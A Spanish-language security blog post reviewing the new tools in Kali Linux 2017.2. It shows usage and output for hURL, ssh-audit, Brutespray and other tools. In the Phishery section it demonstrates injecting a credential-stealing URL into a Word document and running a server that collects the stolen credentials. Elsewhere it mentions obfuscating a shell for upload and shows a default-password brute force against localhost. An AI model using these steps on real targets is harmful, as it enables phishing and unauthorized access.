Blog sobre seguridad informática, privacidad, anonimato, hacking ético, programación y sistemas operativos en general.

Visitas al blog!

Ayúdanos a seguir.

Páginas Amigas

martes, 26 de septiembre de 2017

Kali Linux 2017.2: La reciente versión de Kali Linux, sus nuevas herramientas, funciones y uso.


Kali Linux es una distribución especialmente diseñada para pruebas de pentesting en todos los ámbitos, debido a su gran calidad, número de herramientas y eficiencia, es la distribución de hacking más conocida a nivel mundial. Este pasado 20 de septiembre Kali Linux lanzó su ultima versión, Kali Linux 2017.2 la cual incluye un gran número significativo de cambios. A raiz del lanzamiento han salido a la luz cientos de publicaciones pero todas muy superficiales y poco útiles a decir verdad, más allá de algo meramente informativo no dicen mucho más. Nosotros nos enfocaremos en explicar sus nuevas herramientas, uso y sus funciones a detalle para que sean comprensibles. La versión mencionada puede ser descargada desde aquí, si ya tienes Kali Linux instalado solamente debes ejecutar los siguientes comandos:

apt update && apt upgrade && apt full-upgrade

A continuación mencionaremos sus nuevas herramientas:

1. hURL (Hexadecimal & URL encoder/decoder): Es un script sencillo, ligero y que cumple con todos los requisitos al momento de usarlo. Cómo su nombre lo indica sirve para codificar/decodificar URL's en diferentes tipos de formatos o hash. Las opciones disponible las podemos ver con el comando hurl --help, también podemos ejecutarlo a modo de una especie de "GUI" mediante el comando hurl -M.


[shl@SecHackLabs ~]$ hurl --help
.::[ hURL - hexadecimal & URL (en/de)coder ]::.
v2.1 @COPYLEFT  ->  fnord0 <at> riseup <dot> net

  USAGE: /usr/bin/hurl [ -flag|--flag ] [ -f <file1>,<file2> ] [ string ]

  COMMAND LINE ARGUMENTS
   -M|--menu    => Menu-driven GUI         ;  /usr/bin/hurl -M
   -U|--URL    => URL encode             ;  /usr/bin/hurl -U "hello world"
   -u|--url    => uRL decode             ;  /usr/bin/hurl -u "hello%20world"
   -D|--DURL    => Double URL encode         ;  /usr/bin/hurl -D "hello world"
   -d|--durl    => double URL decode         ;  /usr/bin/hurl -d "hello%2520world"
   -B|--BASE64    => Base64 encode         ;  /usr/bin/hurl -B "hello world"
   -b|--base64    => base64 decode         ;  /usr/bin/hurl -b "aGVsbG8gd29ybGQ="
   -H|--HTML    => HTML encode             ;  /usr/bin/hurl -H "<hello world>"
   -h|--html    => hTML decode             ;  /usr/bin/hurl -h "&lt;hello world&gt;"
   -X|--HEX    => ascii ->  heX         ;  /usr/bin/hurl -X "hello world"
    --esc   :: output in escaped string        ; "\x00\x01\x02\x03 ..."
    --pair  :: output in hexpair format        ; 00010203 ...
   -x|--hex    => hex   ->  ascii         ;  /usr/bin/hurl -x "68656c6c6f20776f726c64"
   -I|--INT    => Int   ->  hex         ;  /usr/bin/hurl -I "10"
   -i|--int    => hex   ->  int         ;  /usr/bin/hurl -i "0xa"
   -n|--nint    => -int  ->  hex         ;  /usr/bin/hurl -n -- -77
   -N|--NHEX    => -hex  ->  iNt         ;  /usr/bin/hurl -N 0xffffffb3
   -T|--INTB    => inT   ->  bin         ;  /usr/bin/hurl -T 30
   -t|--bint    => bin   ->  int         ;  /usr/bin/hurl -t 1010
   -F|--FLOATH    => Float ->  hex         ;  /usr/bin/hurl -F 3.33
   -l|--hfloat    => hex   ->  float         ;  /usr/bin/hurl -l 0x40551ed8
   -o|--octh    => octal ->  hex         ;  /usr/bin/hurl -o 35
   -O|--HOCT    => hex   ->  Octal         ;  /usr/bin/hurl -O 0x12
   -0|--binh    => bin   ->  hex         ;  /usr/bin/hurl -0 1100011
   -1|--hexb    => hex   ->  bin         ;  /usr/bin/hurl -1 0x63
   -2|--SHA1    => SHA1 checksum         ;  /usr/bin/hurl -2 "hello world"
   -3|--SHA224    => SHA224 checksum         ;  /usr/bin/hurl -3 "hello world"
   -4|--SHA256    => SHA256 checksum         ;  /usr/bin/hurl -4 "hello world"
   -5|--SHA384    => SHA384 checksum         ;  /usr/bin/hurl -5 "hello world"
   -6|--SHA512    => SHA512 checksum         ;  /usr/bin/hurl -6 "hello world"
   -7|--ROT13    => ROT13 encode             ;  /usr/bin/hurl -7 "hello world"
   -8|--rot13    => ROT13 decode             ;  /usr/bin/hurl -8 "uryyb jbeyq"
   -9|--stack    => push string 2 stack (corelan) ;  /usr/bin/hurl -9 "hello world"
    --esc   :: output in escaped string        ; "\x00\x01\x02\x03 ..."
    --pair  :: output in hexpair format        ; 00010203 ...
    --ansiC :: output in C format            ; 0x00, 0x01, 0x02, 0x03 ...
   -m|--md5    => md5 digest             ;  /usr/bin/hurl -m "hello world"
   -e|--net    => int -> hex (net-byte order)   ;  /usr/bin/hurl -e 4444
   -E|--NET    => hex (nEt-byte order) ->  int  ;  /usr/bin/hurl -E 5c11
   -w|--wbin    => hex [file] -> binary [file]     ;  /usr/bin/hurl -w -f <INfile> <OUTfile>
   -r|--rbin    => binary [file] -> hex (corelan);  /usr/bin/hurl -r -f /tmp/msgbox.bin
    --esc   :: output in escaped string        ; "\x00\x01\x02\x03 ..."
    --pair  :: output in hexpair format        ; 00010203 ...
    --ansiC :: output in C format            ; 0x00, 0x01, 0x02, 0x03 ...

   --color|--nocolor    => enable/disable colored output [default is ENABLED]
   --corelan        => display corelan reference
   --help        => displays help
   --man        => displays extended help with examples
   --version        => displays version information

   -s                => suppress (display result only)
   -f|--file <file1>,<file2>    => use file(s) as input
   [string]            => string as input

 

[shl@SecHackLabs ~]$ hurl -M
    [========================================================]
    [          hURL - v2.1 by fnord0 - @COPYLEFT             ]
    [========================================================]

 ##     Command            Example Input        Example Output
 ---    ----------------    -------------        --------------
  1)    URL encode        hello world        hello%20world
  2)    URL decode        hello%20world        hello world
  3)    Double URL encode    hello world        hello%2520world
  4)    Double URL decode    hello%2520world        hello world
  5)    Base64 encode        hello world        aGVsbG8gd29ybGQ=
  6)    Base64 decode        aGVsbG8gd29ybGQ=    hello world
  7)    HTML encode        <hello world>        &lt;hello world&gt;
  8)    HTML decode        &lt;hello world&gt;    hello world
  9)    RAW/ascii -> HEX    hello world        68656c6c6f20776f726c64
 10)    HEX   ->  RAW/ascii    68656c6c6f20776f726c64    hello world
 11)    INT   ->  HEX        10            0xa
 12)    HEX   ->  INT        0xa            10
 13)    -INT  ->  HEX        -77            FFFFFFFFFFFFFFB3
 14)    -HEX  ->  INT        FFFFFFB3        -77
 15)    INT   ->  BIN        30            00011110
 16)    BIN   ->  INT        1010            10
 17)    FLOAT ->  HEX        3.33            0xb81e5540
 18)    HEX   ->  FLOAT        0x40551ed8        1079320280.000000
 19)    OCTAL ->  HEX        35            0x1d
 20)    HEX   ->  octal        0x1d            35
 21)    BIN   ->  HEX        1100011            0x63
 22)    HEX   ->  BIN        63            1100011
 23)    SHA1 checksum        hello world        2aae6c35c94fcfb415dbe95f408b9ce9...
 24)    SHA224 checksum        hello world        2f05477fc24bb4faefd86517156dafde...
 25)    SHA256 checksum        hello world        b94d27b9934d3e08a52e52d7da7dabfa...
 26)    SHA384 checksum        hello world        fdbd8e75a67f29f701a4e040385e2e23...
 27)    SHA512 checksum        hello world        309ecc489c12d6eb4cc40f50c902f2b4...
 28)    ROT13 encode        hello world        uryyb jbeyq
 29)    ROT13 decode        uryyb jbeyq        hello world
 30)    MD5 digest        hello world        5eb63bbbe01eeed093cb22bb8f5acdc3

 ##     Commands useful for shellcode creation     Input           Output
 ---    --------------------------------------     -----           ------
 31)    push string 2 stack (corelanc0d3r)     hello world   ASM code to push string to stack
 32)    BINARY [infile] -> HEX (corelanc0d3r)     BINARY FILE   HEX to screen + counts NULL bytes
 33)    HEX [infile] -> BINARY [outfile]     HEX FILE      BINARY FILE
 34)    INT -> HEX (network-byte order)         4444           5c11
 35)    HEX (network-byte order) -> INT         5c11           4444

 99)    Exit hURL

hURL> 5
hURL:Base64encode> string or file? :: [string] 
hURL:Base64encode:string> http://securityhacklabs.blogspot.com

Original       :: http://securityhacklabs.blogspot.com
base64 ENcoded :: aHR0cDovL3NlY3VyaXR5aGFja2xhYnMuYmxvZ3Nwb3QuY29t

Press ENTER to continue...

 
Es una herramienta a la que podemos además darle otros usos como codificar archivos también para después darles otro uso (payloads codificados o simplemente ofuscar el código para que no sea visible a todo el mundo cuando querramos subir una shell a un servidor, son ejemplos).

[shl@SecHackLabs ~]$ echo "https://securityhacklabs.blogspot.com" > test
[shl@SecHackLabs ~]$ hurl -X -f test

Original file :: test
Hex ENcoded   :: 68747470733a2f2f73656375726974796861636b6c6162732e626c6f6773706f742e636f6d
File byte count: 37 bytes
[shl@SecHackLabs ~]$ hurl -X --esc -f test

Original file :: test
Hex ENcoded   :: "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x65\x63\x75\x72\x69\x74\x79\x68\x61\x63\x6b\x6c\x61\x62\x73\x2e\x62\x6c\x6f\x67\x73\x70\x6f\x74\x2e\x63\x6f\x6d"
File byte count: 37 bytes
[shl@SecHackLabs ~]$ 

2. Phishery: Es un servidor HTTP SSL simple con el propósito principal de robar credenciales por medio de phishing mediante la autenticación básica en sistemas windows. Phishery también proporciona la capacidad de inyectar fácilmente URL's maliciosas en documentos .docx de Word.

El poder de phishery se demuestra mejor cambiando la plantilla de un documento de Word en una URL de phishery. Esto hace que Microsoft Word haga una solicitud a la dirección URL inyectada, lo que resulta en un cuadro de diálogo de autenticación que se muestra al usuario final. La posibilidad de inyectar cualquier archivo .docx con una URL se puede hacer de la siguiente manera:


[shl@SecHackLabs ~]$ phishery -u https://securityhacklabs.blogspot.com -i ~/documento.docx -o ~/documentoinfectado.docx
[+] Opening Word document: /home/shl/documento.docx
[+] Setting Word document template to: https://securityhacklabs.blogspot.com
[+] Saving injected Word document to: /home/shl/documentoinfectado.docx
[*] Injected Word document has been saved!
[shl@SecHackLabs ~]$ 

Si la injección ha sido exitosa, cuando el usuario final abra el archivo .docx se le presentará una ventana cómo la que aparece a continuación.


Nota: Es importante cambiar la URL a la que deseamos que nuestra víctima envíe sus credenciales, es decir, colocar en el parámetro -u la dirección IP y el puerto generado al ejecutar cómo root el comando phishery.


[shl@SecHackLabs ~]$ sudo phishery 

[sudo] password for shl: 

[+] Credential store initialized at: credentials.json

[+] Starting HTTPS Auth Server on: 0.0.0.0:443

Las credenciales robadas se guardarán en el fichero credentials.json.

3. SSH-Audit: Una herramienta diseñada para auditar servicios SSH en servidores la cual puede detectar tipos de encriptación, sistemas operativos, versiones usadas, recomendar posibles exploits para usar en cada versión del software ejecutado en el objetivo, soporta los protocolos SSH1 y SSH2 y recomienda algoritmos de acuerdo al software que sea reconocido en el objetivo.

[shl@SecHackLabs ~]$ ssh-audit 

# ssh-audit.py v1.7.0, moo@arthepsy.eu



usage: ssh-audit.py [-1246pbnvl] <host>



   -h,  --help             print this help

   -1,  --ssh1             force ssh version 1 only

   -2,  --ssh2             force ssh version 2 only

   -4,  --ipv4             enable IPv4 (order of precedence)

   -6,  --ipv6             enable IPv6 (order of precedence)

   -p,  --port=<port>      port to connect

   -b,  --batch            batch output

   -n,  --no-colors        disable colors

   -v,  --verbose          verbose output

   -l,  --level=<level>    minimum output level (info|warn|fail)

Para usarlo necesitamos un servidor corriendo SSH, tomamos cómo ejemplo Github. El uso básico es sencillo: ssh-audit $servidor.

[shl@SecHackLabs ~]$ ssh-audit github.com
# general
(gen) banner: SSH-2.0-libssh_0.7.0
(gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)
(gen) compression: enabled (zlib, zlib@openssh.com)

# key exchange algorithms
(kex) curve25519-sha256@libssh.org          -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp384                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521                    -- [fail] using weak elliptic curves
                                            `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256  -- [warn] using custom size modulus (possibly weak)
                                            `- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group14-sha1           -- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
(kex) diffie-hellman-group1-sha1            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
                                            `- [warn] using small 1024-bit modulus
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28

# host-key algorithms
(key) ssh-dss                               -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
                                            `- [warn] using small 1024-bit modulus
                                            `- [warn] using weak random number generator could reveal the key
                                            `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
(key) ssh-rsa                               -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28

# encryption algorithms (ciphers)
(enc) chacha20-poly1305@openssh.com         -- [info] available since OpenSSH 6.5
                                            `- [info] default cipher since OpenSSH 6.9.
(enc) aes256-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr                            -- [info] available since OpenSSH 3.7
(enc) aes128-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes256-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher mode
                                            `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
(enc) aes192-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher mode
                                            `- [info] available since OpenSSH 2.3.0
(enc) aes128-cbc                            -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [warn] using weak cipher mode
                                            `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
(enc) blowfish-cbc                          -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
                                            `- [fail] disabled since Dropbear SSH 0.53
                                            `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
                                            `- [warn] using weak cipher mode
                                            `- [warn] using small 64-bit block size
                                            `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28

# message authentication code algorithms
(mac) hmac-sha2-256                         -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512                         -- [warn] using encrypt-and-MAC mode
                                            `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1                             -- [warn] using encrypt-and-MAC mode
                                            `- [warn] using weak hashing algorithm
                                            `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28

# algorithm recommendations (for OpenSSH 6.5)
(rec) -ecdh-sha2-nistp521                   -- kex algorithm to remove 
(rec) -ecdh-sha2-nistp384                   -- kex algorithm to remove 
(rec) -ecdh-sha2-nistp256                   -- kex algorithm to remove 
(rec) -diffie-hellman-group1-sha1           -- kex algorithm to remove 
(rec) -diffie-hellman-group14-sha1          -- kex algorithm to remove 
(rec) -ssh-dss                              -- key algorithm to remove 
(rec) +ssh-ed25519                          -- key algorithm to append 
(rec) -aes192-cbc                           -- enc algorithm to remove 
(rec) -aes128-cbc                           -- enc algorithm to remove 
(rec) -blowfish-cbc                         -- enc algorithm to remove 
(rec) -aes256-cbc                           -- enc algorithm to remove 
(rec) +aes128-gcm@openssh.com               -- enc algorithm to append 
(rec) +aes256-gcm@openssh.com               -- enc algorithm to append 
(rec) -hmac-sha2-512                        -- mac algorithm to remove 
(rec) -hmac-sha1                            -- mac algorithm to remove 
(rec) -hmac-sha2-256                        -- mac algorithm to remove 
(rec) +hmac-sha2-256-etm@openssh.com        -- mac algorithm to append 
(rec) +hmac-sha2-512-etm@openssh.com        -- mac algorithm to append 
(rec) +umac-128-etm@openssh.com             -- mac algorithm to append 

Esta herramienta es bastante útil si queremos explotar fallos SSH en versiones antiguas de software instalado, si queremos una información más detallada basta con ejecutar: ssh-audit -l info $servidor.

4. APT2 (Automated Penetration Tool): APT2, es una herramienta diseñada para realizar diferentes tipos de escaneos utilizando Nmap o bien, importar resultados generados por Nexpose, Nessus o Nmap.Los resultados y reportes son generados en formato HTML para que sean más comprensibles al usuario final.

APT2 ha sido probado hasta el nomento en sistemas GNU/Linux solamente, para que se ejecute su módulo principal necesitamos tener instalada la librería python2-nmap. Si deseamos un escaner más robusto y con más características necesitamos instalar las siguientes dependencias: convert, dirb, hydra, java, john, ldapsearch, msfconsole, nmap, nmblookup, phantomjs, responder, rpcclient, secretsdump.py, smbclient, snmpwalk, sslscan y xwd.

Su configuración puede ser modificada, lo que hace que sea muy sencilla y fácil de adaptar a nuestras necesidades, es archivo de configuración está en /usr/share/apt2/misc/default.cfg, o bien en el directorio /misc dentro de la instlación o descarga de APT2.

¿Que podemos realizar con APT2?

* Identificar servicios y sistemas operativos.
* Tomas capturas de pantalla de aplicaiones web, VNC, X11, etc. 
* Analizar servicios FTP y archivos compartidos.
* Lanzar ataques de fuerza bruta.
* Lanzar módulos de metasploit.
* Desencriptar hashes usando Jhon The Ripper/Hashcat.


A continuación un vídeo demostrativo sobre el uso y lo que se puede lograr con APT2.

5. BloodHunt: Es una herramienta que usa la teoría de los gráficos para identificar y revelar rutas no deseadas dentro de un entorno de Active Directory, las cuales pueden ser usadas por un atacante para obtener accesos no autorizados o bien por el administrador de un Active Directory para corregir los fallos. BloodHunt es una aplicación web JavaScript de una sola página, basada en Linkurious,compilada con  Electron y con una base de datos Neo4j la cual es conectada mediante PowerShell. Si deseas más información acerca de BloodHunt la puedes encontrar en su Wiki.


6. CrackMapExec(CME): Es una herramienta de post-explotación que ayuda a automatizar la evaluación de la seguridad en grandes redes con Active Directory. CME sigue el principio "Viviendo de la tierra", es decir, utiliza funciones y protocoloes propios de Active Directory para funcionar lo que le permite evadir la mayoría de IDS (Sistema de deteccion de intrusos)/IPS y medidas de seguridad implementadas normalmente.

Inicialmente fue diseñada para realizar ataques pero puede ser usada por auditores/administradores para analizar sus redes y corregir fallos. CME facilita
el uso de PowerSploit, una herramienta que utiliza funciones propias de PowerShell para realizar técnicas de ataque y explotación. Podemos encontrar más acerca de CME en su wiki.
 

7. Dbeaver: Es un cliente para el manejo de bases de datos que soporta los muchos tipos de bases de datos entre ellos: MySQL, PostgreSQL, MariaDB, SQLite, Oracle, DB2, SQL Server, Sybase, MS Access, Teradata, Firebird, Derby, etc. Especial para el manejo de servidores o laboratorios propios que deseemos crear para realizar pruebas de pentesting.


8. Brutespray: Brutespray es una herramienta que funciona de la siguiente manera: Realiza un escaneo con Nmap y de acuerdo a sus resultados comprueba contraseñas y usuarios por defecto en servicios encontrados usando el cracker de contraseñas Medusa. A continuación dejaré la salida por terminal de brutespray para que entiendan el funcionamiento de esta herramienta.

[shl@SecHackLabs ~]$ nmap localhost -oG test.gnmap

Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 23:24 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000037s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
3306/tcp open  mysql
5432/tcp open  postgresql
9050/tcp open  tor-socks

Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds
[shl@SecHackLabs ~]$ less test.gnmap 
[shl@SecHackLabs ~]$ sudo brutespray --file /home/shl/test.gnmap --threads 5 --hosts 5

 brutespray.py v1.5.2
 Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
 Inspired by: Leon Johnson/@sho-luv
 Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>

Starting to brute, please make sure to use the right amount of threads(-t) and parallel hosts(-T)...  \

Brute-Forcing...     
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 1 complete) Password: password (1 of 4 complete)
ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 1 complete) Password: admin (2 of 4 complete)
ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 1 complete) Password: admin (1 of 4 complete)
ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 1 complete) Password: root (2 of 4 complete)
ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 1 complete) Password: toor (3 of 4 complete)
ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 2, 2 complete) Password: root (4 of 4 complete)
ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 2 complete) Password: toor (3 of 4 complete)
ACCOUNT CHECK: [mysql] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 2, 2 complete) Password: password (4 of 4 complete)
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: Password1 (1 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: toor (2 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: password (3 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 0 complete) Password: root (4 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: password1 (5 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: password123 (6 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: Password123 (7 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: postgres (1 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: root (1 of 3, 1 complete) Password: postgres (8 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: root (2 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: toor (3 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: Password1 (4 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: password (5 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 1 complete) Password: password1 (6 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 2 complete) Password: Password123 (7 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: admin (2 of 3, 2 complete) Password: password123 (8 of 8 complete)
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 2 complete) Password: postgres (1 of 8 complete)
ACCOUNT FOUND: [postgres] Host: 127.0.0.1 User: postgres Password: postgres [SUCCESS]
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 3 complete) Password: toor (2 of 8 complete)
ACCOUNT FOUND: [postgres] Host: 127.0.0.1 User: postgres Password: toor [SUCCESS]
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 4 complete) Password: Password1 (3 of 8 complete)
ACCOUNT FOUND: [postgres] Host: 127.0.0.1 User: postgres Password: Password1 [SUCCESS]
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 5 complete) Password: root (4 of 8 complete)
ACCOUNT FOUND: [postgres] Host: 127.0.0.1 User: postgres Password: root [SUCCESS]
ACCOUNT CHECK: [postgres] Host: 127.0.0.1 (1 of 1, 0 complete) User: postgres (3 of 3, 6 complete) Password: password (5 of 8 complete)
ACCOUNT FOUND: [postgres] Host: 127.0.0.1 User: postgres Password: password [SUCCESS]
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>


Recomendaciones.

1. A pesar de que Kali Linux es una distribución que tomó el modelo rolling-release, aún no se acopla en su totalidad a dicho modelo y por lo tanto las grandes actualizaciones (entre versiones) terminan con paquetes y/o tuberías rotas, lo más recomendable es que hagas un backup de tus datos y reinstales la distribución desde la ISO nueva.

2. Si aún conociendo los riesgos anteriores deseas no reinstalar, BAJO NINGÚN MOTIVO ejecutes directamente el apt update && apt-dist-upgrade, debido a que muchas de las nuevas librerías y/o paquetes dependen de otras nuevas es MUY RECOMENDABLE ejecutar el apt upgrade antes de pasar a la siguiente versión.

3. Si reinstalas Kali Linux (O cualquier otra distribución) siempre debes dejar al menos la carpeta /home/$user por fuera del disco root, es decir, en una partición aparte. De este modo evitas tener que realizar backups fuera de la unidad o tener que volver a descargar archivos.

4. Existe una distribución de Hacking que es modelo Rolling-release por naturaleza: BlackArch. ¡Anímate a probarla! Security Hack Labs la recomienda.

5. Otra opción es que utilices la reconocida y pretigiosa distribución ArchLinux cómo una distribución de hacking, aquí te enseñamos cómo hacerlo.

6. Si deseas conocer cual versión de Kali Linux estás usando luego de actualizar, basta con que escribas el comando: lsb_release -a.

Con esto finalizamos esta publicación la cual esperamos que haya sido de su agrado. Si tienen dudas, recomendaciones sobre nuevos post o cualquier mensaje, pueden dejarlo en los comentarios.

Síguenos en Facebook, Twitter y unete a nuestra charla en Riot (Para charlar con nosotros online).

También puedes dejar su donación a nuestra cuenta Paypal.

0 comentarios:

Publicar un comentario